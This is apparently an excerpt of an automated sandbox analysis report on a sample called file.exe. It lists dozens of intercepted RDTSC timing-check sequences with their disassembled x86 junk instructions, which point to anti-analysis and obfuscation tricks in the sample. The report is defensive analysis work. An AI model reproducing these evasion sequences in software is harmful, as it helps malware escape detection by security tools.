                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10613F1 second address: 1061418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FFAAD0A8F16h 0x00000009 jmp 00007FFAAD0A8F1Fh 0x0000000e jl 00007FFAAD0A8F16h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061418 second address: 1061420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10616A2 second address: 10616B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007FFAAD0A8F21h 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10616B9 second address: 10616C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061834 second address: 1061893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F25h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e je 00007FFAAD0A8F16h 0x00000014 popad 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007FFAAD0A8F25h 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FFAAD0A8F25h 0x00000029 jc 00007FFAAD0A8F16h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061893 second address: 1061897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061B95 second address: 1061B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061D17 second address: 1061D22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FFAACBEF8C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065ED2 second address: 1065ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065ED6 second address: 1065EE0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065EE0 second address: 1065EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065EE6 second address: 1065F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FFAACBEF8D9h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066197 second address: 10661BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D2207h], ebx 0x00000014 push 00000004h 0x00000016 mov dx, bx 0x00000019 push 6ECDDA6Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop eax 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10661BB second address: 10661CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10661CF second address: 10661D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106643B second address: 1066474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFAACBEF8CDh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007FFAACBEF8D0h 0x00000018 pop edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066474 second address: 10664CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FFAAD0A8F1Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FFAAD0A8F18h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sub edx, 082BF030h 0x0000002e push dword ptr [ebp+122D3100h] 0x00000034 sub edx, dword ptr [ebp+122D2D45h] 0x0000003a call 00007FFAAD0A8F19h 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10664CC second address: 10664D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10664D0 second address: 10664D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10664D4 second address: 106650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FFAACBEF8D7h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jo 00007FFAACBEF8E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFAACBEF8CBh 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106650A second address: 1066524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066524 second address: 1066529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066529 second address: 106652E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106652E second address: 1066540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066540 second address: 1066547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066547 second address: 106655E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067EB3 second address: 1067EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067EBA second address: 1067EBF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067EBF second address: 1067EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30C50 second address: 4A30C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8D1h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 pushfd 0x00000016 jmp 00007FFAACBEF8D0h 0x0000001b sbb ah, FFFFFFB8h 0x0000001e jmp 00007FFAACBEF8CBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30C92 second address: 4A30CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 adc si, D67Eh 0x0000000e jmp 00007FFAAD0A8F29h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAAD0A8F1Dh 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20AE1 second address: 4A20B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFAACBEF8D4h 0x0000000a add si, 3B68h 0x0000000f jmp 00007FFAACBEF8CBh 0x00000014 popfd 0x00000015 popad 0x00000016 mov cx, 1D5Fh 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov dx, C2D6h 0x00000021 mov si, bx 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FFAACBEF8D2h 0x0000002f sub eax, 0A64F8F8h 0x00000035 jmp 00007FFAACBEF8CBh 0x0000003a popfd 0x0000003b mov bx, ax 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20B48 second address: 4A20B62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFAAD0A8F1Bh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, 10h 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60943 second address: 4A609A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FFAACBEF8D3h 0x00000012 pushfd 0x00000013 jmp 00007FFAACBEF8D8h 0x00000018 sub ecx, 358E1DC8h 0x0000001e jmp 00007FFAACBEF8CBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000C5 second address: 4A000CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000CA second address: 4A00116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8D6h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 42EE8B84h 0x00000016 mov dl, DBh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edi, 3A4DDDB4h 0x00000022 call 00007FFAACBEF8CDh 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00116 second address: 4A0011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0011C second address: 4A00120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00120 second address: 4A00162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FFAAD0A8F24h 0x0000000f push dword ptr [ebp+04h] 0x00000012 jmp 00007FFAAD0A8F20h 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFAAD0A8F1Ah 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00162 second address: 4A00171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20832 second address: 4A20836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20836 second address: 4A2083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2083A second address: 4A20840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20840 second address: 4A20876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov edx, 2D587A16h 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 call 00007FFAACBEF8D3h 0x00000019 pop eax 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edx, esi 0x00000022 mov eax, 1D8C7213h 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20876 second address: 4A2088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F24h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2088E second address: 4A208B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAACBEF8D5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20476 second address: 4A2052B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFAAD0A8F28h 0x00000008 sbb eax, 550F2AD8h 0x0000000e jmp 00007FFAAD0A8F1Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007FFAAD0A8F28h 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFAAD0A8F21h 0x00000024 sub ah, 00000026h 0x00000027 jmp 00007FFAAD0A8F21h 0x0000002c popfd 0x0000002d jmp 00007FFAAD0A8F20h 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007FFAAD0A8F20h 0x00000039 mov ebp, esp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FFAAD0A8F1Dh 0x00000044 jmp 00007FFAAD0A8F1Bh 0x00000049 popfd 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20359 second address: 4A203DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8CEh 0x0000000f push eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pushfd 0x00000013 jmp 00007FFAACBEF8CCh 0x00000018 jmp 00007FFAACBEF8D5h 0x0000001d popfd 0x0000001e pop eax 0x0000001f pushfd 0x00000020 jmp 00007FFAACBEF8D1h 0x00000025 add si, A236h 0x0000002a jmp 00007FFAACBEF8D1h 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203DD second address: 4A203E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203E1 second address: 4A203E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203E7 second address: 4A203FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F21h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203FC second address: 4A2041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2041B second address: 4A2041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2041F second address: 4A20425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A200BA second address: 4A200BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A200BE second address: 4A200C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A200C4 second address: 4A20145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 jmp 00007FFAAD0A8F26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 mov ebx, esi 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FFAAD0A8F1Fh 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FFAAD0A8F26h 0x00000022 mov ebp, esp 0x00000024 jmp 00007FFAAD0A8F20h 0x00000029 pop ebp 0x0000002a pushad 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FFAAD0A8F1Ch 0x00000032 adc ch, FFFFFFC8h 0x00000035 jmp 00007FFAAD0A8F1Bh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20E22 second address: 4A20E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20E28 second address: 4A20E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAAD0A8F27h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20E52 second address: 4A20E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20E58 second address: 4A20E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20E5C second address: 4A20EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ax, C59Bh 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FFAACBEF8D4h 0x00000020 adc esi, 148C0798h 0x00000026 jmp 00007FFAACBEF8CBh 0x0000002b popfd 0x0000002c mov bx, ax 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A607B1 second address: 4A607B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A607B5 second address: 4A607BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A607BB second address: 4A607E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FFAAD0A8F1Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A607E3 second address: 4A607ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 movsx ebx, cx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A607ED second address: 4A60812 instructions: 0x00000000 rdtsc 0x00000002 call 00007FFAAD0A8F28h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60812 second address: 4A60830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FFAACBEF8D8h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60830 second address: 4A6084B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F27h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4000D second address: 4A40058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8D0h 0x0000000f push eax 0x00000010 jmp 00007FFAACBEF8CBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFAACBEF8D5h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40058 second address: 4A40060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40060 second address: 4A40084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FFAACBEF8D1h 0x00000011 pop esi 0x00000012 mov ebx, 725AEE74h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40084 second address: 4A4008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4008A second address: 4A40107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e jmp 00007FFAACBEF8D0h 0x00000013 and dword ptr [eax], 00000000h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FFAACBEF8CEh 0x0000001d or cx, 7288h 0x00000022 jmp 00007FFAACBEF8CBh 0x00000027 popfd 0x00000028 call 00007FFAACBEF8D8h 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 popad 0x00000031 and dword ptr [eax+04h], 00000000h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FFAACBEF8CAh 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40107 second address: 4A40116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, CDh 0x00000005 push ecx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30BCC second address: 4A30BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30BD0 second address: 4A30BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
